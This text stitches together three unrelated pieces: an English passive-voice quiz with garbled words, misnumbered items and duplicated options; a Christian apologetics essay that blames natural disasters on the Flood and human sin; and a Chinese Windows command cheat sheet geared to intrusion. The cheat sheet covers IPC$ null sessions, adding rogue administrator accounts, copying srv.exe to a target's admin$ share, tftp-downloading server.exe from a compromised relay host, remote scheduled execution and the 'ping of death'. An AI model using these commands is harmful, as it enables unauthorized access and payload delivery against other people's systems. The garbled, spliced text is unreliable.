14. Your new computer will soon become outdated, because technology

_______so fast.

A. is developed B. is being developed

C. has been developed D. will developed

15. I won’t go to the party unless _________.

A. invited B. being invited

C. be invited D. inviting

16. The problem ________ last week is very important.

A. was discussed B. discussed

C. being discussed D. be discussed

17. We should keep the animals from ________.

A. be endangered B. endangering

C. being endangered D. endangered

18. There are no rivers _______out of the Dead Sea.

A. flowed B. flowing

C. being flowed D. be flown

19. This place has been destroyed. So there is no bamboo ______

for pandas to feed on.

A. left B. leaving C. leave D. be left

20. All the preparations for the task ________ , and we are ready to start.

A. completed B. complete

C. had been completed D. have been completed


1)It is said that a new robot ____by him in a few days.

A) designed

B) has been designed

C) will be designed

D) will have been designed

2)We are late. I expect the film ____by the time we get to the cinema.

A) will already have started

B) would already have started

C) shall have already started

D) has already been started

3) She will stop showing off if no notice____ of her.

A) is taken

B) takes

C) will be taken

D) has taken

4) Diamond ____in Brazil in 1971.

A) is found

B) has been found

C) was found

D) had been found

5)“Have you movedsintosthe new flat?”“Not yet. The room____.”

A) has been painted

B) is painted

C) paints

D) is being painted

6) My pictures ____until next Friday.

A) won't develop

B) aren't developed

C) don't develop

D) won' t be developed

7) Tim ____since he lost his job three weeks ago.

A) had been unemployed

B) was unemployed

C) has been unemployed

D) has unemployed

8) A great number of colleges and universities ____since 1949.

A) has been establish

B) have been established

C) have established

D) had been established

9) I'll have to push the car to the side of the road because we ____if we leave it here.

A) would be fined

B) will be fined

C) will being fined

D) will have been fined

10)“____two tickets for the new play at the Grand Theatre on Saturday. Shall we go and see it together?”

A) They have been given

B) I have been given

C) I am given

D) They have given to me

11) The subject of these lectures ____by the lecture committee.

A) is announced

B) have been announced

C) are announced

D) has been announced

12) I found an aspirin bottle ____dropped on the floor of David's room.

A) was

B) had

C) had been

D) is13)The goods ____when we arrived at the airport.

A) were just unloading

B) were just been unloading

C) had just unloaded

D) were just being unloaded

14) If one ____by pride, he will reject useful advice and friendly assistance.

A) overcomes

B) is overcome

C) has been overcome

D) overcome

15) Most environment problems exist because adequate measures for preventing them ____taken in the past.

A) was not

B) were not

C) were not being

D) had not been

16) You ought to have put the milk in the refrigerator, now ____sour.

A) I smell

B) it is smelt

C) it smells

D) it is smelling

17) After the race____, the celebration began.

A) had been won

B) is won

C) will be won

D)has been won

18) He was here for a little while, but I don't knowswhereshe ____now.

A) is

B) was

C) had been

D) has been

18) The young teacher has ____ competent.

A) been proved to be

B) proved to be

C) been proved

D) proved being

19) Pluto, the outermost planet of the solar system, ____photographically in March 1930.

A) discovered

B) was discovered

C) by discovery

D) when discovered

20) To get a better view of the stage, ____.

A)our seats had to be changed

B) our seats were changed

C) we had to change our seats

D) our seats were changed by us

22) After synthetic____, engineers had a better choice of material.

A) created

B) has created

C) has been created

D) had been created

23) I think much attention ____your pronunciation.

A) must be paid to

B) ought to be paid to

C) must pay to

D) should be paid to

24) Since 1970, millions of enthusiasts ____Vitamin C, which they believe can remedy the common cold.

A) have taken

B) have been taken

C) have been taking

D) have been taking

25) I don't remember ____the chance to try this method.

A)shavingsbeen given

B) to have been given


D) to have given

26) We could ask someone to do the work privately without it____.

A) know

B) be known

C) being known

D) to be known

27) The construction of the laboratory ____by the end of next month.

A) must be completed

B) must have been completed

C) will be completing

D) will have been completing

28) They would tell how the African ____on a ship to an American port.

A) was brought

B) could have been brought

C) had been brought

D) was to be brought

29) He does not possess a bicycle, this one he uses ____to Peter.

A) is belonged to

B) belonged

C) belongs

D) is belonging

30) Negotiation ____again with Moscow tomorrow, a great event will be discussed then.

A) is to be opened

B) is on the point of opening

C) is going to open

D) opens

31) The reason for all the changes being made ____to us yet.

A) has not explained

B) has not been explained

C) did not explained

D) were not explained

32) Experiments in the photography of moving objects ____in both the United States and Europe well before 1900.

A) were conducting

B)were conducted

C) had been conducted

D) had conducted

33) When he turned the corner, he found himself ____by a man in black.

A) tailed

B) been tailed

C) was tailed

D) had been tailed

34) A candidate for the democratic presidential nomination ____at this moment.

A) is interviewing

B) being interviewed

C) is being interviewed

D) interviewing

35) As we approached the work site, the workers were seen ____the new house.

A) building

B) build

C) built

D) to build

36) As we know, all the regulations in school ____.

A) must keep to

B) must be kept

C) must keep

D) must be kept up

37) The composition ____any more.

A) need not to be corrected

B) doesn't need to be corrected

C) doesn't need be corrected

D) need not correct

38) The bank is reported in the local newspaper ____in broad daylight yesterday

A) to be robbed

B) to have keen robbed

C) robbed

D)shavingsbeen robbed

39) Hurry up, or the tickets ___out by the time we get there.

A) will have sold

B) will sell

C) have sold

D) will have been sold

40) He cleaned the glasses carefully for fear that it ____.

A) was damaged

B) should be damaged

C) damaged

D) would be damaged


1)C 2)A 3)A 4)C 5)D 6)D 7)C 8)B 9)B 10)B11)D 12)C 13)D 14)B 15)B 16)C 17)A 18)A 19)B20)B 21)C 22)D 23)A 24)C 25)A 26)C 27)A 28)C29)C 30)A 31)B 32)C 33)A 34)C 35)A 36)B 37)B38)B 39)D 40)B

Man can do little in the face of nature disaster?


The Earth is plagued with all kinds of natural disasters (tornadoes, hurricanes, floods, etc.). How can these tragedies be reconciled with a supposedly good, benevolent God?


September 21, 1989—Hurricane Hugo strikes the southeastern coast of the United States. Over 25 people are killed, and over $10 billion worth of damage results. One month later—October 17, 1989—an earthquake registering 7.1 on the Richter scale strikes the San Francisco Bay area in California. At least 62 people are killed, and damage estimates are placed at well over $1 billion. August 24, 1992—Hurricane Andrew hits three counties in southern Florida. More than a dozen people lose their lives, and damage estimates are set at over $20 billion. A year later, on September 11, 1992, Hurricane Iniki devastates the Hawaiian islands. At least four people die, and damage is set at over $1 billion. In June 1993, huge portions of numerous states along the Mississippi River and its tributaries experienced the worst flooding in their history. Entire cities were covered with water measured not in inches, but in feet. At least 47 people died, and more than 25,000 were evacuated from their homes.

Do these types of natural disasters represent merely isolated, infrequent events? Hardly. Throughout history, man has recorded many such tragedies. In 526, an earthquake hit the country now known as Turkey and left 250,000 dead. A similar earthquake in China in 1556 killed over 830,000 people. Another quake in India in 1737 annihilated 300,000, and quakes in Central China in 1920, 1927, and 1932 killed 200,000, 200,000, and 70,000 people respectively. In 1889, the famous “Johnstown Flood” occurred in Pennsylvania. The dam of the South Fork Reservoir, twelve miles east of the city, burst during heavy rains. Over 2,000 people were killed, and property damage was estimated to be over $10 million. In 1969, Hurricane Camille killed more than 250 people in seven states from Louisiana to Virginia, leaving behind over $1.5 billion in damage. In 1983, Hurricane Alicia struck near Galveston, killing 21 and causing over $2 billion in damage.

It is rare indeed, it seems, for a single generation in a given locale to be spared at least some kind of natural disaster. Without warning, tornadoes sweep down from the afternoon sky and destroy in a moment’s fury what took decades or centuries to build. Floods cover “old home places,” and remove forever any vestige of what were once storehouses of hallowed memories. In a matter of seconds, earthquakes irreparably alter once-familiar landscapes. Hurricanes come from the sea, demolish practically everything in their paths, and then dissipate as if they never had existed. Each time humanity suffers. And each time there are those who ask “Why?”


In the face of disasters such as those described above, there is hardly any question likely to be asked more routinely than “why?” But the question is not always asked in the same way, or with the same intent. Some stand on the charred remains of what was once their home and ask, “why me?”—and mean exactly that. Why them and why now? All they want is to understand the physical events that have changed their lives, and to learn what they can do to correct the situation and avoid a repeat of it. They are not looking to assign blame; they merely want an explanation of the prevailing circumstances.

Others view the destruction around them and ask “why?,” but their inquiry is brief and their response immediate. They correctly view the Earth as a once-perfect-but-now-flawed home for mankind. Rather than their faith in God being diminished by the ravages of ongoing natural phenomena, it is strengthened because they: (a) know that there are rational biblical and scientific explanations for such events; (b) understand that after all is said and done, “the Judge of all the Earth will do that which is right” (Genesis 18:25); and (c) put their faith into action as they work to help themselves, or those around them whose lives have been affected by a disaster.

Still others view natural disasters and ask “why?,” when what they really mean is: “If a benevolent God exists, why did He allow these things to happen?” The implication of their statement is clear. Since these things did happen, God must not exist.


It is not my purpose here to address the “why me, why now?” question that seeks a physical explanation as to what kind of swirling wind current spawns a tornado, or what kind of geological phenomena may be responsible for an earthquake. Much has been written on these topics that can provide adequate answers for those willing to research the problem. Instead, I would like to answer the more pressing philosophical questions of why the Earth experiences natural disasters in the first place, and why such disasters are not incompatible with a benevolent God.

Our Once-Perfect-But-Now-Flawed Planet

At the end of His six days of creation (Genesis 1:31), God surveyed all that He had made, and proclaimed it “very good”—Hebrew terminology representing that which was both complete and perfect. Rivers were running, fish were swimming, and birds were flying. Pestilence, disease, and human death were unknown. Man existed in an idyllic paradise of happiness and beauty where he shared such an intimate and blissful covenant relationship with his Maker that God came to the garden “in the cool of the day” to commune with its human inhabitants (Genesis 3:8). Additionally, Genesis 3:22 records that man had continual access to the tree of life that stood in the garden, the fruit of which would allow him to live forever.

The peacefulness and tranquillity of the first days of humanity were not to prevail, however. In Genesis 3—in fewer words than an average sportswriter would use to discuss a Friday night high school football game—Moses, through inspiration, discussed the breaking of the covenant relationship between man and God, the entrance of sin into the world, and the curse(s) that resulted therefrom. When our original parents revolted against their Creator, evil entered the world. Moses informs us that as a direct consequence of human sin, the Earth was “cursed” (Genesis 3:17). Paul, in Romans 8:19-20, declared that the entire creation was subjected to “vanity” and the “bondage of corruption” as a result of the sinful events that took place in Eden on that occasion. Things apparently deteriorated rapidly. Just three chapters later, Moses wrote:

And Jehovah saw that the wickedness of man was great in the earth, and that every imagination of the thoughts of his heart was only evil continually. And it repented Jehovah that he had made man on the earth, and it grieved him at his heart. And Jehovah said, I will destroy man whom I have created from the face of the earth; both man and beast, and creeping things, and birds of the heavens (Genesis 6:5-7).

Genesis 6-8 records the global destruction resulting from the Great Flood sent by God as His instrument of judgment. The text indicates that the waters which caused the Flood derived from two sources: (a) “the fountains of the great deep”; and (b) “the windows of heaven” (Genesis 7:11). Water fell for forty days and nights (Genesis 7:12,17), and eventually covered “all the high mountains that were under the whole heaven” (Genesis 7:19). We may only surmise the changes that the Flood wrought upon the Earth. Local floods can cause tremendous damage in very brief periods. Imagine, then, the damage that water covering every mountain fifteen cubits (Genesis 7:20; approximately 22? feet) must have caused. As one writer has suggested:

The destructive power of flood-waters is evident from what flood waters in recent years have done. They moved blocks of granite weighing 350 tons more than a hundred yards. Boulders weighing 75 to 210 tons have been moved by flood waters only 15 to 20 feet deep.... What vast devastation must have been created when all those forces of the earth worked together; rain gushing down from the canopy above the firmament, earthquakes shaking the earth, many volcanoes erupting and exploding at one time, continents shifting, mountains lifting up, tornados, hurricanes and wild windstorms raging, gigantic tidal waves with crosscurrents and whirlpools raising havoc.... Truly, the Flood was the greatest and most violent catastrophe in the history of the world, with total destruction of all forms of life and of the entire surface of the earth (Sippert, 1989, pp. 78-79).

What were conditions like on the Earth prior to the Great Flood? Numerous biblical scholars have suggested that conditions were radically different than those we see today, and that the Earth was devoid of the many natural disasters that it presently experiences (see Rehwinkel, 1951; Whitcomb and Morris, 1961; Dillow, 1981). Whitcomb and Morris have stated, for example:

This is inferred from the fact that the “breaking-up of the fountains of the great deep” (Genesis 7:11), which implies this sort of activity, was one of the immediate causes of the Deluge; therefore it must have been restrained previously.... Thus the Biblical record implies that the age between the fall of man and the resultant Deluge was one of comparative quiescence geologically. The waters both above and below the firmament were in large measure restrained, temperatures were equably warm, there were no heavy rains nor winds and probably no earthquakes nor volcanic emissions (1961, pp. 242,243).

It is not unreasonable to suggest, knowing the changes caused by local floods, that the global Flood of Genesis 6-8 not only radically altered the face of the Earth, but simultaneously produced circumstances that are responsible for many natural disasters experienced since that time. New, higher mountains and lower valleys were produced by God after the Flood (Psalm 104:6-10). Approximately 71.9% of the Earth’s surface remained covered with water. Temperature changes occurred, producing seasonal variations unlike any before. No doubt other factors were involved as well.

What causes natural disasters on the Earth today? One cause is the vastly different geological and meteorological phenomena now present. Tall mountains and deep valleys may be conducive to localized extremes in weather. The drastically changed components of the Earth’s crust (e.g., fault lines, etc.) give rise to earthquakes. Vast bodies of water, and large global climatic variations, spawn hurricanes and tropical storms.

Taken at face value, then, the wickedness of mankind in Noah’s day (which precipitated the Flood) is responsible ultimately for the changes that now produce various natural disasters. As Brad Bromling has observed:

While we may never know with precision what conditions prevailed between the Edenic period and the Flood, it seems that the weather systems with which we are familiar were largely absent at that time. The fossil record bespeaks a period when the entire Earth enjoyed a temperate climate. This storm-free era most certainly predates the Flood. Since that event, man has been imperiled by tornadoes, blizzards, monsoons, and hurricanes.... Upon whom should we heap blame for the suffering resultant from such weather? Is it fair to accuse God, when He created man’s home free from such things (Genesis 1:31)? In all honesty, the answer is no. Sin robbed us of our original garden paradise, and sin was responsible for the global deluge (Genesis 3:24; 6:7) [1992, p. 17].

One writer concluded: “[T]he cause of all that is wrong with the earth is not godliness but rather ungodliness” (Porter, 1974, p. 467, emp. in orig.). The matter of man’s personal volition has much to do with this. The Scriptures speak to the fact that since God is love, and since love allows freedom of choice, God allows freedom of choice (cf. Joshua 24:15; John 5:39-40). God did not create mankind as robots without any free moral agency. Mankind now reaps the consequences of the misuse of freedom of choice (i.e., the sin) of previous generations. Surely one of the lessons here is that it does not pay to disobey the Creator. In his second epistle, Peter made a clear reference to “the world that then was,” and its destruction by the Flood (3:6). That world no longer exists. Today we inhabit a once-perfect-but-now-flawed Earth. Man—not God—bears the blame.

Natural Disasters and a Benevolent God

The Bible teaches that God is both all-powerful and loving; thus He is benevolent, as love demands. How, then, can He allow natural disasters to occur? Do not natural disasters negate the benevolence of God, and strike at His very existence? In addition to the reasons listed in the section above, I would like to suggest the following reasons why they do not.

First, God created a world ruled by natural laws established at the Creation. If a man steps off the roof of a five-story building, gravity will pull him to the pavement beneath. If a boy steps in front of a moving freight train, since two objects cannot occupy the same space at the same time, the train will strike the child and likely kill him. The same laws that govern gravity, matter in motion, or similar phenomena also govern weather patterns, water movement, and other geological/meteorological conditions. All of nature is regulated by these laws, not just the parts that we find convenient.

Second, some disasters may be the by-product of something that itself is good. In addressing this point, Norman Geisler has noted:

In a physical world where there is water for boating and swimming, some will drown. If there are mountains to climb, there must also be valleys into which one may fall. If there are cars to drive, collisions can also occur. It may be said that tornadoes, lightning, hurricanes, and other natural disasters are likewise by-products of a good physical world. For instance, the purpose of rain is not to flood or drown, but the result of rain may include these disasters. Likewise, hot and cold air are an essential and purposeful part of the physical world, but under certain conditions they may combine to form tornadoes (1978, p. 72, emp. in orig.).

The natural laws that God created allow man to produce fire. But the same laws that enable him to cook his food also allow him to destroy entire forests. Laws that make it possible to have things constructive to human life also introduce the possibility that things destructive to human life may occur. How can it be otherwise? A car is matter in motion, and takes us where we wish to go. But if someone steps in front of that car, the same natural laws that operate to our benefit will operate in a similar fashion to our detriment.

Third, natural laws are both inviolate and non-selective. Everyone must obey them or suffer the consequences. In Luke 13:2-5, Jesus told the story of eighteen men who perished when the tower of Siloam collapsed. Had these men perished because of their sin? No, they were no worse sinners than their peers. They died because a natural law was in force. Fortunately, natural laws work continually so that we can understand and benefit from them. We are not left to sort out some kind of haphazard system that works one day, but not the next.

Those who rail against God because of natural disasters often are overheard to ask, “But why can’t God ‘selectively intervene’ to prevent disasters?” Bruce Reichenbach has addressed this question:

Thus, in a world which operates according to divine miraculous intervention, there would be no necessary relation between phenomena, and in particular between cause and effect. In some instances one event would follow from a certain set of conditions, another time a different event, and so on, such that ultimately an uncountable variety of events would follow a given set of conditions. There would be no regularity of consequence, no natural production of effects.... Hence, we could not know or even suppose what course of action to take to accomplish a certain rationally conceived goal. Thus, we could neither propose action nor act ourselves (1976, p. 187).

If God suspended natural laws every time His creatures were in a dangerous situation, chaos would corrupt the cosmos, arguing more for a world of atheism than a world of theism! Further, as Geisler has remarked:

First, evil men do not really want God to intercept every evil act or thought. No one wants to get a headache every time he thinks against God. One does not want God to fill his mouth with cotton when he speaks evil of God, nor does he really desire God to explode his pen as he writes against God or destroy his books before they come off the press. At best, people really want God to intercept some evil actions.... Second, continual interference would disrupt the regularity of natural law and make life impossible. Everyday living depends on physical laws such as inertia or gravity. Regular interruption of these would make everyday life impossible and a human being extremely edgy! Third, it is probable that chaos would result from continued miraculous intervention. Imagine children throwing knives at parents because they know they will be turned to rubber, and parents driving through stop signs, knowing God will create crash-protection air shields to avert any ensuing collisions. The necessary intervention would finally grow in proportions that would effectively remove human freedom and responsibility (1978, p. 75, emp. in orig.).

How, then, exactly, would the unbeliever suggest that an understandable, dependable world be created, and operated, other than the way ours presently is? How could natural disasters be prevented, while maintaining natural laws and human freedom?


Those who suggest that the existence of a benevolent God is impossible as a result of “natural evil” often call for a better world than this one. But they cannot describe the details necessary for its creation and maintenance. When—in an attempt to “improve” it—they begin to “tinker” with the actual world around them, they invariably find themselves worse off.

Instead of blaming God when tragedies such as natural disasters strike, we need to turn to Him for strength, and let tragedies, of whatever nature, remind us that this world was never intended to be a final home (Hebrews 11:13-16). Our time here is temporary (James 4:14), and with God’s help we are able to overcome whatever comes our way (Romans 8:35-39; Psalm 46:1-3). In the end, the most important question is not, “Why did this happen to me?,” but instead, “How can I understand what has happened, and how am I going to react to it?” With Peter, the faithful Christian can echo the sentiment that God, “ who called you unto his eternal glory in Christ, after that ye have suffered a little while, shall himself perfect, establish, strengthen you. To him be the dominion for ever and ever” (1 Peter 5:10).


Bromling, Brad T. (1992), “Who Sent the Hurricane?,” Reasoning from Revelation, 4:17, Semptember.

Dillow, Joseph C. (1982), The Waters Above (Chicago, IL: Moody).

Geisler, Norman L. (1978), The Roots of Evil (Grand Rapids MI: Zondervan).

Porter, Walter L. (1974), “Why Do the Innocent Suffer?,” Firm Foundation, 91[30]: 467,475, July 23.

Rehwinkel, A.M. (1951), The Flood (St. Louis, MO: Concordia).

Reichenbach, Bruce (1976), “Natural Evils and Natural Laws,” International Philosophical Quarterly, Vol. 16.

Sippert, Albert (1989), From Eternity to Eternity (North Mankato, MN: Sippert Publishing).

Whitcomb, John C. and Henry M. Morris (1961), The Genesis Flood (Grand Rapids, MI: Baker).


net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二:

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

#3 三:

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令=字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

#4 四:


iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)

iisreset /start或stop 启动(停止)所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。

FTP 命令: (后面有详细说明内容)


ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。

-d 使用调试方式。

-n 限制ftp的自动登录,即不使用.netrc文件。

-g 取消全局文件名。

help [命令] 或 ?[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote-dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip

#5 五:


mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。

(例:mysql -h110.110.110.110 -Uroot -P123456


exit 退出MYSQL

mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)

show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。

use mysql;

show tables; 显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名; 建库

use 库名;

create table 表名 (字段设定列表); 建表

drop database 库名;

drop table 表名; 删库和删表

delete from 表名; 将表中记录清空

select * from 表名; 显示表中的记录

mysqldump --opt schoolschool.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。


shutdown /参数 关闭或重启本地或远程主机。

参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。

例:shutdown /r /t 0 立即重启本地主机(无延时)

taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

